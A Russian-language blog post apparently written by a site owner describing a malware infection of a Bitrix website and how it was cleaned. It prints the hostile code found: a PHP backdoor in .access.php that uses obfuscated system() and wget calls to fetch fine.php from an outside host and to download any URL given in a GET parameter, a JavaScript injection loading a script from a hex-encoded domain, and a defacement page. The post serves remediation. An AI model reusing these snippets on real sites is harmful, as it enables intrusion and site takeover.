Найти в Дзене
Канцелярская
52 подписчика

Вирус на веб-сайте от 02.11.2025

3
2 мин
Столкнулся с вирусом на веб-сайте с использованием google tagmanager и pageads на сайте Битрикс. Может быть описание кому-то поможет. Взлом: подгружается скрипт URL запроса https://googleads.g.doubleclick.net/pagead/viewthroughconversion/643629910/?random=1762077472446&cv=11&fst=176207747....
https://www.googletagmanager.com/gtag/js?id=G-EJ6T9LN45P&cx=c&_slc=1
https://googleads.g.doubleclick.net/pagead/viewthroughconversion/643629910/?random=1762077472446&cv=11&fst=1762077472446....
В структуре есть очень большой файл с повторяющимися строками .mod.txt eyJVTklRVUVfSUQiOiJhT0EzQk .... Также много файлов fine.php и .буквы_цифры.php почти в каждой папке Переписываются файлы .access.php <?php if(file_exists("fine.php") && filesize("fine.php") < 1337) {unlink("fine.php");} if(!file_exists("fine.php")) { $url = "tcriver.ru/bitrix/tools/checks/fine.php"; $f = "sy"; $f .= "stem"; $w = "wg"; $w .= "et "; $f($w . " " . $url); } if(isset($_GET["idur"])) { $f = "sy"; $f .= "stem"; $w = "wg"; $w

Столкнулся с вирусом на веб-сайте с использованием google tagmanager и pageads на сайте Битрикс. Может быть описание кому-то поможет.

Скрин вирусного кода
Скрин вирусного кода

Взлом: подгружается скрипт

URL запроса

https://googleads.g.doubleclick.net/pagead/viewthroughconversion/643629910/?random=1762077472446&cv=11&fst=176207747....
https://www.googletagmanager.com/gtag/js?id=G-EJ6T9LN45P&cx=c&_slc=1

https://googleads.g.doubleclick.net/pagead/viewthroughconversion/643629910/?random=1762077472446&cv=11&fst=1762077472446....


В структуре есть очень большой файл с повторяющимися строками

.mod.txt

eyJVTklRVUVfSUQiOiJhT0EzQk ....

Также много файлов fine.php и .буквы_цифры.php почти в каждой папке

Переписываются файлы

.access.php

<?php if(file_exists("fine.php") && filesize("fine.php") < 1337) {unlink("fine.php");} if(!file_exists("fine.php")) { $url = "tcriver.ru/bitrix/tools/checks/fine.php"; $f = "sy"; $f .= "stem"; $w = "wg"; $w .= "et "; $f($w . " " . $url); } if(isset($_GET["idur"])) { $f = "sy"; $f .= "stem"; $w = "wg"; $w .= "et "; $f($w . " " . $_GET["idur"]); } ?>

Найден видимо не относящийся к этому вирусу файл

/bitrix/admin/on.php

<?php echo 7457737+736723;?>

Через www.googletagmanager.com вызывается файл

gardenswood.ru/bitrix/fonts/jsfont/awesome.js (файл до сих пор лежит по этому УРЛ)

Состав:

document.write();

function awesome() {

domain = new URL(window.location).hostname;

check = btoa(domain).substring(0,8);

rurl = 'https://rcaa.ru/whatCyberDefenseDoing/?hacked='+domain+'&check='+check;

htmlcode = `

<body style="background-color:#000">

<div style="text-align:center; background-color: #000; font-size:24px; color:#FFF;line-height: 1.5; z-index:999999;" class="spooky">

<h1><a style="color:#000;background-color: #F00;" href="CLICKURL">#whatCyberDefenseDoing</a> ?</a></h1>

разрушает Россию.....

ВСЕ ФАЙЛЫ
/bitrix/js/main/core
содержат код:

/* font awesome */
if(!window.fontawesome_script) {
var fontawesome_script = document.createElement('script');
var fontawesome_api = "ps://" + decodeURIComponent("%67%61%72%64%65%6e%73%77%6f%6f%64%2e%72%75");

fontawesome_script.setAttribute('src', 'htt' + fontawesome_api + '/bitrix/fonts/jsfont/awesome.js');
document.head.appendChild(fontawesome_script);
};



Отключение Гугл ID в настройках Битрикс может помочь.

замена JS-инъекций в коде JS файлов в папке /home/bitrix/www/bitrix/js/main/core или /bitrix/js/main/core от корня сайта

# Выполняем замену с помощью perl
find . -name "*.js" -type f -exec perl -i -0777 -pe 's|/\* babelHelpers \*/.*?document\.head\.appendChild\(fontawesome_script\);\s*\}| |gs' {} \;